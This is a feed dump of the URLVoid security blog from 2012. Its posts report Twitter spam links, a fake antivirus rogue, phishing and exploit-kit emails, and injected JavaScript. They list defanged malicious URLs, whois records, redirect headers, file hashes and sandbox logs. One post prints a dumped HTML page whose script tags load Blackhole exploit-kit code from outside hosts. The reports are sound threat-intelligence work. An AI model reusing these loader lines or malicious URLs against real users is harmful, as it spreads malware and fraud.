URLVoid Blog http://blog.urlvoid.com Just another WordPress site Fri, 11 May 2012 23:38:00 +0000 en hourly 1 http://wordpress.org/?v=3.3.1 More Malicious Links Spammed to Twitter Users http://blog.urlvoid.com/more-malicious-links-spammed-to-twitter-users/ http://blog.urlvoid.com/more-malicious-links-spammed-to-twitter-users/#comments Fri, 11 May 2012 23:23:30 +0000 admin http://blog.urlvoid.com/?p=1054 Another malicious link received by an user via Twitter:

hxxp:// profitscoaching .info /index.php?eVTv=1336686044437

Whois details:

Domain Name: profitscoaching .info
Registrar: GoDaddy.com LLC (R171-LRMS)
Status: CLIENT DELETE PROHIBITED, CLIENT RENEW PROHIBITED, CLIENT TRANSFER PROHIBITED, CLIENT UPDATE PROHIBITED
Expiration Date: 2013-03-07 14:59:08
Creation Date: 2012-03-07 14:59:08
Last Update Date: 2012-05-06 20:39:46
Name Servers:
ns61.domaincontrol.com
ns62.domaincontrol.com
 
Registrant Contact Information:
Name: Registration Private
Organization: Domains By Proxy, LLC
Address 1: DomainsByProxy.com
Address 2: 15111 N. Hayden Rd., Ste 160, PMB 353
City: Scottsdale
State: Arizona
Zip: 85260
Country: US
Phone: +1.4806242599
Fax: +1.4806242598

Hosting details:

The website profitscoaching .info is hosted at WholeSale Internet and its current IP address is 173.208.196.245 (-). The server machine is located in United States (US) and in the same server there are hosted other 0 websites. The domain is registered with the suffix INFO and the keyword of the domain is profitscoaching. The organization is Gold VIP Club.

The malicious link redirects users to another malicious link:

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.32
Date: Fri, 11 May 2012 22:55:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny16
Set-Cookie: PHPSESSID=1bff1c2b505aa2004bda6028bb28ad0a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: hxxp:// aooale .info /ytb/redirect.php

Extracted malicious link:

hxxp:// aooale .info /ytb/redirect.php

Whois details:

Domain Name: aooale .info
Registrar: GoDaddy.com LLC (R171-LRMS)
Status: CLIENT DELETE PROHIBITED, CLIENT RENEW PROHIBITED, CLIENT TRANSFER PROHIBITED, CLIENT UPDATE PROHIBITED
Expiration Date: 2012-09-21 13:41:55
Creation Date: 2011-09-21 13:41:55
Last Update Date: 2011-11-20 20:41:26
Name Servers:
ns49.domaincontrol.com
ns50.domaincontrol.com
 
Registrant Contact Information:
Name: Registration Private
Organization: Domains By Proxy, LLC
Address 1: DomainsByProxy.com
Address 2: 15111 N. Hayden Rd., Ste 160, PMB 353
City: Scottsdale
State: Arizona
Zip: 85260
Country: US
Phone: +1.4806242599
Fax: +1.4806242598

Hosting details:

The website aooale.info is hosted at DirectSpace Networks, LLC. and its current IP address is 174.140.169.101 (-). The server machine is located in United States (US) and in the same server there are hosted other 0 websites. The domain is registered with the suffix INFO and the keyword of the domain is aooale. The organization is DirectSpace Networks, LLC.

URLVoid scan reports:

http://urlvoid.com/scan/aooale .info
http://urlvoid.com/scan/profitscoaching .info

Other malicious links:

hxxp:// ioi8 .info /gps
hxxp:// bp9 .info /mobi/redirect.php
hxxp:// iso8 .info /lg
hxxp:// jay8 .info /b2d
hxxp:// saov .info /mobilemoneymachines/

The malicious links where users are generally being redirected seem scam pages:

Fake Make Money Sites

The scam pages show fake images of people that take in hand a check and promote the “Work at home mum makes £4,397/month working part-time from home” slogan. Clearly it is a complete scam and you will never get a cent in your check, you will never receive any check in real.

The “end of redirections” is this website:

hxxp:// x.dotcomsecrets .com /?hop=richmondrw

Whois details:

Domain Name: dotcomsecrets .com
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Status: OK
Expiration Date: 2012-10-25
Creation Date: 2000-10-25
Last Update Date: 2012-04-02
Name Servers:
jim.ns.cloudflare.com
ruth.ns.cloudflare.com
 
Administrative Contact:
DotComSecrets .com
Russell Brunson
1.2083239451
Fax: 1. 1.2083239451
10280 W. Ustick Rd.
Boise, ID 83704
US

A Twitter user that has around 400 tweets related to these malicious links:

Twitter User

Link to suspicious users:

hxxps:// twitter .com /#!/thainnmwla0
hxxps:// twitter .com /#!/henthorneondt8

Most of the time the links are detected by Twitter as unsafe:

Unsafe Site detected by Twitter

We always recommend to check unknown links with URLVoid.com.

]]> http://blog.urlvoid.com/more-malicious-links-spammed-to-twitter-users/feed/ 0 Spam link on Twitter leads to Fake Antivirus Rogue Software http://blog.urlvoid.com/spam-link-on-twitter-leads-to-fake-antivirus-rogue-software/ http://blog.urlvoid.com/spam-link-on-twitter-leads-to-fake-antivirus-rogue-software/#comments Tue, 08 May 2012 21:45:45 +0000 admin http://blog.urlvoid.com/?p=1036 One user has reported us a malicious URL that is being sent as a private message to the users that are registered on Twitter, the extracted malicious link is:

hxxp:// www. delicious-audio .com /wp-content

If clicked, it redirects users to a new malicious link:

HTTP/1.1 302 Found
Date: Tue, 08 May 2012 20:50:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Location: hxxp:// blog.keeples .com /wp-content
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 27
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Extracted malicious link:

hxxp:// blog.keeples .com /wp-content

Now there is a new redirect to another malicious link:

HTTP/1.1 302 Found
Date: Tue, 08 May 2012 20:50:13 GMT
Server: Apache/2.2.3 (CentOS)
Location: hxxp:// spywarecleanermicrosoft .info /0520091375cbc551/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Extracted malicious link:

hxxp:// spywarecleanermicrosoft .info /0520091375cbc551/

This is the link of the web page of the fake antivirus rogue software.

Whois details:

Domain Name: spywarecleanermicrosoft.info
Registrar: eNom, Inc. (R126-LRMS)
Status: CLIENT TRANSFER PROHIBITED, TRANSFER PROHIBITED, ADDPERIOD
Expiration Date: 2013-05-08 11:32:40
Creation Date: 2012-05-08 11:32:40
Last Update Date: 2012-05-08 11:33:15
 
Name Servers:
ns1.dnsexit.com
ns2.dnsexit.com
ns3.dnsexit.com
ns4.dnsexit.com
 
Registrant Contact Information:
Name: Gerolamo Genovese
Address 1: Via Bernardino Rota 1
City: Mellana
State: CN
Zip: 12012
Country: IT
Phone: +39.3535605212
Email: kinsman@doramail.com

Hosting details:

The website spywarecleanermicrosoft .info is hosted at BurstNET Limited and its current IP address is 31.193.12.3 (31-193-12-3.static.hostnoc.net). The server machine is located in United Kingdom (GB) and in the same server there are hosted other 0 websites. The domain is registered with the suffix INFO and the keyword of the domain is spywarecleanermicrosoft. The organization is BurstNET Limited.

Screenshot of the fake warning message:

Fake Warning Message

Screenshot of the fake scanning web page:

Fake Scanning Page

From the above images we can see that it is distributed the fake rogue security software named Windows Antivirus 2012. After the fake system scanning is finished, the user is prompted to downloaded an executable file named setup.exe:

Downloaded File

The file is downloaded from a new malicious website:

GET /0520091375cbc551/setup.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: hxxp:// spywarecleanermicrosoft .info /0520091375cbc551/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: scannerdatamicrosoft .info

Whois Details:

Domain Name: scannerdatamicrosoft .info
Registrar: eNom, Inc. (R126-LRMS)
Status: CLIENT TRANSFER PROHIBITED, TRANSFER PROHIBITED, ADDPERIOD
Expiration Date: 2013-05-08 11:11:28
Creation Date: 2012-05-08 11:11:28
Last Update Date: 2012-05-08 11:12:08
 
Name Servers:
ns1.dnsexit.com
ns2.dnsexit.com
ns3.dnsexit.com
ns4.dnsexit.com
 
Registrant Contact Information:
Name: Dionisia Barese
Address 1: Corso Porta Borsari 78
City: San Martino Di Castrozza
State: TN
Zip: 38058
Country: IT
Phone: +39.3171462400
Email: milner@snail-mail.net

Domains Details:

The website scannerdatamicrosoft .info is hosted at SPLIUS, UAB and its current IP address is 77.79.10.13 (hst-10-13.duomenucentras.lt). The server machine is located in Lithuania (LT) and in the same server there are hosted other 0 websites. The domain is registered with the suffix INFO and the keyword of the domain is scannerdatamicrosoft. The organization is Webhosting, collocation services.

File details:

File: setup.exe
Size: 2278400 bytes
MD5: EC91E0F31587F6471A4EBCFE2681A45B
SHA1: 0AB7F7253F5CBADF6D664781A73D30A19E251FCA
SHA256: 67DFD917561DF7FE653CE5E0CD7E0688E42B719F1BB475A5EE2819003CE6DC6A
SHA384: 77BB9D7DF670BC9F4C91DED341086C30570E6D9AE14BEE1A172F502CA5C502428FC631B9F88A31CECF290B7CFB1C5FA2
SHA512: 85D1F0608D24DD2B15477EAC540666319831F829B7E8065D9E5B8A2AC5D4860486BCA891FA95DBBBB8EB93834485575108EE957C5AD556EFBA9FDA5824D2C780

When executed the file setup.exe, the rogue software drops two .EXE files:

Dropped .EXE files

File Modified - %SAMPLE% - %AppData%\Protector-phkm.exe
Process Created - %SAMPLE% - %AppData%\Protector-phkm.exe - Unknown Publisher - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes
File Created - %SAMPLE% - %AppData%\Protector-phkm.exe - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes - attr: [] - PE
Process Created - %SAMPLE% - C:\WINDOWS\system32\cmd.exe - Microsoft Corporation - 6D778E0F95447E6546553EEEA709D03C - 389120 bytes
File Deleted - C:\WINDOWS\system32\cmd.exe - %SAMPLE% - 2278400 bytes
File Modified - %SAMPLE% - %AppData%\Protector-tpqx.exe
Process Created - %SAMPLE% - %AppData%\Protector-tpqx.exe - Unknown Publisher - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes
File Created - %SAMPLE% - %AppData%\Protector-tpqx.exe - EC91E0F31587F6471A4EBCFE2681A45B - 2278400 bytes - attr: [] - PE

And this is the screenshot of the splash screen of the rogue software:

windows-prosecurity-scanner-fake-antivirus

More screenshots of the rogue software:

GUI

When the user click on “Activate” button, the rogue software executable opens a new Internet Explorer web page where user is supposed to insert his/her credit card details (that will be stolen by the trojan), here is the screenshot of the malicious web page:

Fraud Page

Connections logged:

GET / HTTP/1.0
Accept: application/x-shockwave-flash, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www. cmyip .com
Connection: Keep-Alive
 
GET /service/ HTTP/1.0
User-Agent: Mozilla/4.0
Host: 0520091375cbc551 .on-linepaysafery .info
 
POST / HTTP/1.0
Accept: application/x-shockwave-flash, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 0520091375cbc551. on-linepaysafery .info
Content-Length: 109
Connection: Keep-Alive
Pragma: no-cache
Cookie: ct=2011:3:27:23:23; ch=f58320d2a7c79b1a48b7c70a7d2d280a
action=form&projectId=72&partnerId=146&subId=0&install_id=yhstmcvcgj&group_name=2011-3-28_1&reason=errorflash
 
GET /payment_forms/default/images/sprite.png HTTP/1.0
Accept: */*
Referer: hxxp://0520091375cbc551 .on-linepaysafery .info /
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 0520091375cbc551 .on-linepaysafery .info
Connection: Keep-Alive
Cookie: ct=2011:3:27:23:23; ch=f58320d2a7c79b1a48b7c70a7d2d280a

Malicious links extracted:

hxxp:// 0520091375cbc551. on-linepaysafery .info /service/

Whois Details:

Domain Name: on-linepaysafery .info
Registrar: eNom, Inc. (R126-LRMS)
Status: CLIENT TRANSFER PROHIBITED, TRANSFER PROHIBITED, ADDPERIOD
Expiration Date: 2013-05-08 08:24:44
Creation Date: 2012-05-08 08:24:44
Last Update Date: 2012-05-08 08:26:02
 
Name Servers:
ns1.dnsexit.com
ns2.dnsexit.com
ns3.dnsexit.com
ns4.dnsexit.com
 
Registrant Contact Information:
Name: Dionisia Barese
Address 1: Corso Porta Borsari 78
City: San Martino Di Castrozza
State: TN
Zip: 38058
Country: IT
Phone: +39.3171462400
Email: sini@wildmail.com

Domain details:

The website www.on-linepaysafery .info is hosted at SPLIUS, UAB and its current IP address is 77.79.10.15 (hst-10-15.duomenucentras.lt). The server machine is located in Lithuania (LT) and in the same server there are hosted other 2 websites. The domain is registered with the suffix INFO and the keyword of the domain is on-linepaysafery. The organization is Webhosting, collocation services.

URLVoid scan reports:

http://www.urlvoid.com/scan/delicious-audio .com
http://www.urlvoid.com/scan/spywarecleanermicrosoft .info
http://www.urlvoid.com/scan/0520091375cbc551. on-linepaysafery .info
http://www.urlvoid.com/scan/on-linepaysafery .info
http://www.urlvoid.com/scan/blog.keeples .com
http://www.urlvoid.com/scan/scannerdatamicrosoft .info

]]> http://blog.urlvoid.com/spam-link-on-twitter-leads-to-fake-antivirus-rogue-software/feed/ 0 Link LinkedIn Mail leads to Incognito exploit kit http://blog.urlvoid.com/link-linkedin-mail-leads-to-incognito-exploit-kit/ http://blog.urlvoid.com/link-linkedin-mail-leads-to-incognito-exploit-kit/#comments Fri, 04 May 2012 23:22:38 +0000 admin http://blog.urlvoid.com/?p=1020 We have logged a new email that looks like to be sent by LinedIn:

Scam Email

The email header info shows it is a scam:

Received: from lhost10.forahost.net (server-178.211.48.24.as42926.net [178.211.48.24])
Received: from c9069568.static.spo.virtua.com.br ([201.6.149.104]:49583 helo=fixnot.com.tr) by lhost10.forahost.net
Date: Fri, 04 May 2012 08:34:11 -0700
From: "Order" @fixnot.com.tr
Subject: Link LinkedIn Mail

The email body contains also few malicious links:

hxxp:// gopeshmathur .com/ZgUBqavg/index.html

The dumped content of the URL is clear a Incognito exploit kit:

Incognito exploit kit URLs

All the new malicious links are still alive and they redirect users to:

Incognito exploit kit

The Java exploit JAR files are downloaded from:

hxxp:// 50.116.8. 93 /data/Pol.jar
hxxp:// 69.163.34 .114 /data/Pol.jar
File: Pol.jar
Size: 15404 bytes
MD5: 020B0B477706596E71DE25286ED77991
SHA1: C196A7B07BFE3D3593E93F7D98E910FA8E63AFF6
SHA256: F76AC6983135C7A69B5F07BC762F1AA478E2D49489090AC66882BC8065D1862B
SHA384: 9C6BF2971E1F86588A9A08A3F18C096FBC62A42CE6927E0A7D0AFDB56DA01DBC4A6F72F742CC62B510FC1085221753D5
SHA512: 5464424E028620C4821B740B89787C7A75E6A56401F98BD15BA94F1A9268D54411E41E97DAE86468F4BDA54160A023DCC45F134E97BC6655E31C9274F8A21FC0

The JAR file exploits the vulnerability in the Java Runtime Environment component of Oracle Java SE (CVE-2012-0507), more details from the oracle.com website:

Vulnerability in the Java Runtime Environment component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are 7 Update 2 and before, 6 Update 30 and before and 5.0 Update 33 and before. Easily exploitable vulnerability allows successful unauthenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized update, insert or delete access to some Java Runtime Environment accessible data as well as read access to a subset of Java Runtime Environment accessible data and ability to cause a partial denial of service (partial DOS) of Java Runtime Environment.

Other malicious Incognito exploit kit URLs:

hxxp:// ftp.coden .com .br /BhxC8VrP/index.html
hxxp:// generalcontractorsnc .com/nUUyHyvy/index.html
hxxp:// mccgedvalenca .com .br/JFs10e34/index.html
hxxp:// radiooisvira .com /mRpNLgWY/index.html
hxxp:// statisticsolympiad .org /gR2aietM/index.html

URLVoid scan reports:

http://www.urlvoid.com/scan/gopeshmathur .com
http://www.urlvoid.com/scan/jombangit .com
http://www.urlvoid.com/scan/shahinvestment .com
http://www.urlvoid.com/scan/mazyamana .com
http://www.ipvoid.com/scan/72.5.102.224
http://www.urlvoid.com/scan/ftp.coden .com .br
http://www.urlvoid.com/scan/generalcontractorsnc .com
http://www.urlvoid.com/scan/mccgedvalenca .com .br
http://www.urlvoid.com/scan/statisticsolympiad .org
http://www.urlvoid.com/scan/radiooisvira .com

]]> http://blog.urlvoid.com/link-linkedin-mail-leads-to-incognito-exploit-kit/feed/ 0 Com.Br Websites Infected with Maliciour JS Code (bylviha .ru/count18.php) http://blog.urlvoid.com/com-br-websites-infected-with-maliciour-js-code-bylviha-rucount18-php/ http://blog.urlvoid.com/com-br-websites-infected-with-maliciour-js-code-bylviha-rucount18-php/#comments Fri, 27 Apr 2012 13:24:30 +0000 admin http://blog.urlvoid.com/?p=1011 Our sandbox has logged various domains with suffix .COM.BR infected with a malicious obfuscated javascript code, that is injected at begin of the HTML pages of the websites, before the initial <html> tag:

Obfuscated JS code

The malicious script redirects the users to a malicious URL:

hxxp:// bylviha .ru/count18.php

An example of websites infected:

hxxp:// carboniferacatarinense .com .br/
hxxp:// www. csir-iir. org/
hxxp:// www. terapets .com/

Sometimes the malicious script is injected inside the <title> tag:

JS Injected in Title TAG

URLVoid reports of malicious domains:

http://www.urlvoid.com/scan/bylviha .ru
http://www.urlvoid.com/scan/carboniferacatarinense .com .br
http://www.urlvoid.com/scan/csir-iir. org
http://www.urlvoid.com/scan/terapets .com

]]> http://blog.urlvoid.com/com-br-websites-infected-with-maliciour-js-code-bylviha-rucount18-php/feed/ 0 Phishing: A causa del nostro recente aggiornamento. Verified by Visa http://blog.urlvoid.com/phishing-a-causa-del-nostro-recente-aggiornamento-verified-by-visa/ http://blog.urlvoid.com/phishing-a-causa-del-nostro-recente-aggiornamento-verified-by-visa/#comments Mon, 23 Apr 2012 14:40:39 +0000 admin http://blog.urlvoid.com/?p=1006 We have logged other phishing emails used to steal details of Visa users:

From - Mon Apr 23 16:04:50 2012
Received: from ser.just3d.tv (unknown [91.227.127.33])
Received: (qmail 23589 invoked by uid 0); 23 Apr 2012 13:21:36 -0000
Received: from unknown (HELO User) (admin@just3d.tv@151.58.16.184)
Reply-To: sicurela@visaltalia.it
From: "verified by visa" verified@visaitalia.com
Subject: A causa del nostro recente aggiornamento.
Date: Mon, 23 Apr 2012 15.21.34 +0200
To: undisclosed-recipients:;

Note from the email header the source of the message:

Received: from ser.just3d.tv (unknown [91.227.127.33])

It has nothing to do with Visa, and note also the emails:

Reply-To: sicurela@visaltalia.it

See the visaltalia.it is a l and not an i.

The message of the email:

Gentile Cliente, 
A causa del nostro recente aggiornamento sui nostri server 
(23/04/2012) e necessario aggiornare il tuo profilo. 
Per una maggiore sicurezza e di accesso, si prega di compilare il 
modulo allegato. 
 
Vi ringraziamo della vostra collaborazione. 
 
© Copyright Visa Europe 2012. Tutti i diritti riservati

There is also an attached file named visaitalia.html:

File: visaitalia.html
Size: 20015 bytes
MD5: 2C76E9F667E78C8C32C09DBE1129969E
SHA1: 0A30FFC20AC311AF2831086D4B181E0F23483399
SHA256: 1757C6A066E61F1B3E9782570712641FC734E1C6ACCD1DA329F3B10B164136CC
SHA384: BD80E5B8A83A3C00D72B6367421AE85CC6A1FF8981F43D0D6784B52D0AAE58B22DD74293BD8735C8B0E4331C8CCCDA02
SHA512: 4B82AC139180E6B19C58A553456BBE30CE155E22A695E300115CAC5C8BDB3F84A024CCDF104E280162B0C44AF1495C850CA3565533DE62EC6F14EF7754295A30

The attached file contains the form used to send the typed details to a remote link. Listed below there are few malicious links extracted from the HTML attached file:

hxxp:// leonidasvancouver .com /admin/plm/plm.html
hxxp:// rottenfish .de /vbv/plm_files/Logo-Mastercard_Secure_Code.gif
hxxp:// rottenfish .de /vbv/plm_files/fin_VerifiedByVisa_186x79.gif
hxxp:// rottenfish .de /vbv/run.php

The malicious websites are classified as detected in URLVoid:

http://www.urlvoid.com/scan/rottenfish .de/
http://www.urlvoid.com/scan/leonidasvancouver .com/

]]> http://blog.urlvoid.com/phishing-a-causa-del-nostro-recente-aggiornamento-verified-by-visa/feed/ 0 IPVoid v2.0 (BETA3) Changelog http://blog.urlvoid.com/ipvoid-v2-0-beta3-changelog/ http://blog.urlvoid.com/ipvoid-v2-0-beta3-changelog/#comments Thu, 12 Apr 2012 13:18:06 +0000 admin http://blog.urlvoid.com/?p=1003 New BETA3 of IPVoid service is online.

Here is the main changelog:

- Service has been rewritten completely
- Added other blacklists engines (now 37 in total)
- Fixed various blacklists results
- View IP addresses related to an ISP
- View IP addresses related to an Organization
- View IP addresses located in a Country
- View old reports of an IP address
- Rescan an IP address after 30 minutes
- Scanning time is much faster (around 8 seconds)
- Show how much is old the report (ex: 20 Days Ago)

Want to suggest a feature or report a bug ?
Contact us at info (at) novirusthanks (dot) org

]]> http://blog.urlvoid.com/ipvoid-v2-0-beta3-changelog/feed/ 2 Express LinkedIn Mail: spread Blackhole Exploit Kit URLs http://blog.urlvoid.com/express-linkedin-mail-spread-blackhole-exploit-kit-urls/ http://blog.urlvoid.com/express-linkedin-mail-spread-blackhole-exploit-kit-urls/#comments Fri, 30 Mar 2012 22:03:34 +0000 admin http://blog.urlvoid.com/?p=992 We have received few emails that looked like to be sent from LinkedIn:

Email

But after checking email header details it was clearly a spam:

Return-Path: trtro@www.trt.ro
Received: from vps136.whmpanels.com (unknown [89.42.219.181])
Received: from [95.6.42.101] (helo=www.trt.ro) by vps136.whmpanels.com
Date: Fri, 30 Mar 2012 21:37:47 +0100
From: "Support" trtro@www.trt.ro
Subject: Express LinkedIn Mail

The A HREF links redirect to 3 different malicious URLs:

hxxp:// groupehydrogaz .com/20sZhJqa/index.html
hxxp:// dealerpos .com/uFj7A93z/index.html
hxxp:// hobbyconcept666.yellis .net/20sZhJqa/index.html

URLVoid reports:

http://www.urlvoid.com/scan/groupehydrogaz.com/
http://www.urlvoid.com/scan/dealerpos.com/
http://www.urlvoid.com/scan/hobbyconcept666.yellis.net/

The page content dumped from one of these malicious URLs looks like:

Dumped Content

That content looks like the spread-style of Blackhole Exploit Kit.

Other malicious URLs are:

hxxp:// ftp.planitur .com.br/dyEmcL4N/js.js
hxxp:// quiztown .org/U2iBLpvu/js.js
hxxp:// wap .tl/8M6kMfpV/js.js
hxxp:// laspeziacaritas .it/1M4VoeVe/js.js

URLVoid reports:

http://www.urlvoid.com/scan/ftp.planitur.com.br/
http://www.urlvoid.com/scan/quiztown.org/
http://www.urlvoid.com/scan/wap.tl/
http://www.urlvoid.com/scan/laspeziacaritas.it/

Pay always attention when opening known and unknown emails:

1) Always analyze email headers to see who sent the email
2) Scan links with our service http://www.urlvoid.com/
3) Do not download unknown files
4) Avoid to open emails that have subject related to pharmaceutical products
5) Avoid to open emails that have subject related to sexual content
6) When emails are from your Bank, always call your Bank before open the email

]]> http://blog.urlvoid.com/express-linkedin-mail-spread-blackhole-exploit-kit-urls/feed/ 0 URLVoid v2.0 (BETA3) Changelog http://blog.urlvoid.com/urlvoid-v2-0-beta3-changelog/ http://blog.urlvoid.com/urlvoid-v2-0-beta3-changelog/#comments Thu, 29 Mar 2012 22:40:24 +0000 admin http://blog.urlvoid.com/?p=989 New BETA3 of URLVoid service is online.

Here is the main changelog:

- Fixed various blacklists results
- Added AVGThreatLabs (http://www.avgthreatlabs.com/)
- Added URLVir (http://www.urlvir.com/)
- Added new statistic: “View 8 zones that have the most detected domains”
- Added new tool: Ping Host (http://ping.urlvoid.com/)
- Added new tool: DNS Records (http://www.urlvoid.com/tools/dns-records/)
- Added new tool: SSL Check (http://sslcheck.urlvoid.com/)
- Added domain length
- Show report date in GMT
- Show “All Reports” dates in GMT
- Fixed IP History (example: http://www.urlvoid.com/scan/google.com/)
- Fixed number of blacklists in old reports
- Fixed display of detection rate in old reports
- Fixed graphs in statistics page
- Minor fixes and optimizations

Want to suggest a feature or report a bug ?
Contact us at info@novirusthanks.org

]]> http://blog.urlvoid.com/urlvoid-v2-0-beta3-changelog/feed/ 1 URLVoid v2.0 (BETA2) Changelog http://blog.urlvoid.com/urlvoid-v2-0-beta2-changelog/ http://blog.urlvoid.com/urlvoid-v2-0-beta2-changelog/#comments Fri, 16 Mar 2012 16:08:54 +0000 admin http://blog.urlvoid.com/?p=985 We have released the new version of URLVoid v2.0 (BETA2) on 16/03/2012. A lot has changed, we have recoded almost everything, scanning of a website is now much faster, we allow users to view also other details about a website, such as traffic statistics, where it is hosted, its organization and it is now possible to re-scan a website after 30 minutes, providing the correct re-CAPTCHA.

Here is the main changelog:

- Service has been rewritten completely
- View domains hosted in an IP address
- View domains hosted with an ISP
- View domains hosted with an Organization
- View domains hosted in a Country
- View domains hosted in a Zone (TLD)
- Traffic statistics about websites (Alexa rank, Google PR, Alexa graphs)
- View old reports of a domain
- Rescan a website after 30 minutes
- Scanning time is much faster (around 5 seconds)
- Show how much is old the report (ex: 20 Days Ago)
- Added new tool: What is My IP
- Added new tool: IP Lookup
- Added new tool: Unshorten URL
- Added new tool: URL Decode
- Added new tool: URL Encode
- Added new tool: String Lowercase
- Added new tool: String Uppercase
- Added new tool: MD5 Hash
- Added new tool: SHA1 Hash
- Detailed statistics page about scanned websites
- New blacklist engines (EXPOSURE) (more to come)
- Fixed few blacklist engines results
- Domains are “suggested” in the scan form
- Added “Like” button of Facebook

Report any bugs to: info (at) novirusthanks (dot) org

]]> http://blog.urlvoid.com/urlvoid-v2-0-beta2-changelog/feed/ 3 Spam “Your updated information is necessary” leads to Blackhole Exploit Kit http://blog.urlvoid.com/spam-your-updated-information-is-necessary-leads-to-blackhole-exploit-kit/ http://blog.urlvoid.com/spam-your-updated-information-is-necessary-leads-to-blackhole-exploit-kit/#comments Sat, 28 Jan 2012 14:45:24 +0000 admin http://blog.urlvoid.com/?p=962 We have received various spam emails that simulate messages from Better Business Bureau (BBB), but in real are used to spread malicious links that leads to Blackhole Exploit Kit. The subject of the emails looks like this:

Your updated information is necessary

A screenshot of the email:

Image

Other details of the emails:

Return-Path: <top-team3@ms16.hinet.net>
Received: from msr6.hinet.net (msr6.hinet.net [168.95.4.106])
Received: from ms16.hinet.net ([178.206.55.126])
Date: Thu, 26 Jan 2012 22:49:15 +1000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.7) Gecko/20100713 Lightning/1.0b2 Thunderbird/3.1.1
Subject: Your updated information is necessary

The link present in the email:

hxxp://app.alaskaoregonwe sternwashington.bbb.org/sbq

Redirects users to the malicious link:

hxxp://circutor .com/4ethe8ep/index.html

The dumped content of the malicious link is:

<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="hxxp://diamondservice.com .au/B0bifDVW/js.js"></script>
<script type="text/javascript" src="hxxp://therefugees.altervista .org/wqWcKZ8w/js.js"></script>
<script type="text/javascript" src="hxxp://www.rentacandle.com .au/4SvXUuz4/js.js"></script>
 
</html>

Extracted malicious links (active as of now) that lead to Blackhole Exploit Kit are:

hxxp://diamondservice.com .au/B0bifDVW/js.js
hxxp://www.rentacandle.com .au/4SvXUuz4/js.js

We have analyzed the malicious link with our sandbox, and this is the report:

Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 213.229.188.210 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - circutor .com - /4ethe8ep/index.html
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 203.210.112.33 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - diamondservice .com.au - /B0bifDVW/js.js
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\8YPELNXD\js[1].js - 7A6BC5BCB465D4C54CA3D185FD5D45F0 - 75 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 50.116.33.235 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron .com - /search.php?page=ac2393a35636dfa1
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\VBPHH91D\search[1].htm - D2EE09D5DBE3B22B66CFF67B81999E55 - 2048 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 65.55.13.243 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - activex.microsoft .com - /objects/ocget.dll
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player\AssetCache
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player\AssetCache\N6MCDZF7
File Modified - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\LOCALS~1\Temp\java_install_reg.log
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %Temp%\hsperfdata_%UserName%\856 - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Sun\Java\Deployment\deployment.properties - 2EDE01E8DF28D3DC2BF961089BC9A241 - 635 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 64.4.52.169 - 80
Process Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %ProgramFiles%\Java\jre6\bin\java.exe - Sun Microsystems, Inc. - D600A0D8FACA5158CA8B221006997808 - 144792 bytes
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - codecs.microsoft .com - /isapi/ocget.dll
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\hsperfdata_%UserName%\2016 - NOTHING TO HASH - 0 bytes - attr: [] - -
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\java_install_reg.log
